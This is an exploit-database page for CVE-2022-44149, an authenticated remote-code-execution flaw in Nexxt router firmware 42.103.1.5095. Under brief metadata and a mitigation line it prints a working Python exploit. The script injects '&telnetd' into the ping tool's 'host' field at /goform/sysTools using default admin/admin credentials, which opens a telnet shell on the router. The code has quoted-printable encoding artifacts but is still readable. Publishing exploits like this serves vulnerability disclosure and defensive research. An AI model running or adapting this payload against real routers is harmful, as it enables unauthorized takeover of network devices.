header-logo
Suggest Exploit
vendor:
Nexxt Router Firmware
by:
Yerodin Richards
8.8
CVSS
HIGH
Remote Code Execution (RCE)
78
CWE
Product Name: Nexxt Router Firmware
Affected Version From: 42.103.1.5095
Affected Version To: 42.103.1.5095
Patch Exists: YES
Related CWE: CVE-2022-44149
CPE: h:nexxtsolutions:nexxt_router_firmware
Metasploit:
Other Scripts:
Platforms Tested: ARN02304U8
2022

Nexxt Router Firmware 42.103.1.5095 – Remote Code Execution (RCE) (Authenticated)

This exploit allows an authenticated user to execute arbitrary code on the Nexxt Router Firmware 42.103.1.5095. The exploit is achieved by sending a malicious payload to the router's /goform/sysTools endpoint. The payload is sent using a POST request with the Authorization header set to the base64 encoded credentials of the user. The payload is sent as a parameter in the request body.

Mitigation:

Ensure that all users have strong passwords and that the router is running the latest version of the firmware.
Source

Exploit-DB raw data:

# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Executio=
n (RCE) (Authenticated)
# Date: 19/10/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.nexxtsolutions.com/
# Version: 42.103.1.5095
# Tested on: ARN02304U8
# CVE : CVE-2022-44149

import requests
import base64

router_host =3D "http://192.168.1.1"
username =3D "admin"
password =3D "admin"


def main():
    send_payload("&telnetd")
    print("connect to router using: `telnet "+router_host.split("//")[1]+ "=
` using known credentials")
    pass

def gen_header(u, p):
    return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")

def get_cookie(header):
    url =3D router_host+"/login"
    params =3D {"arg":header, "_n":1}
    resp=3Drequests.get(url, params=3Dparams)
   =20
def send_payload(payload):
    url =3D router_host+"/goform/sysTools"
    headers =3D {"Authorization": "Basic {}".format(gen_header(username, pa=
ssword))}
    params =3D {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK=
"}
    requests.post(url, headers=3Dheaders, data=3Dparams)


if __name__ =3D=3D '__main__':
    main()

Navigation

Suggest Exploit

Services By CQR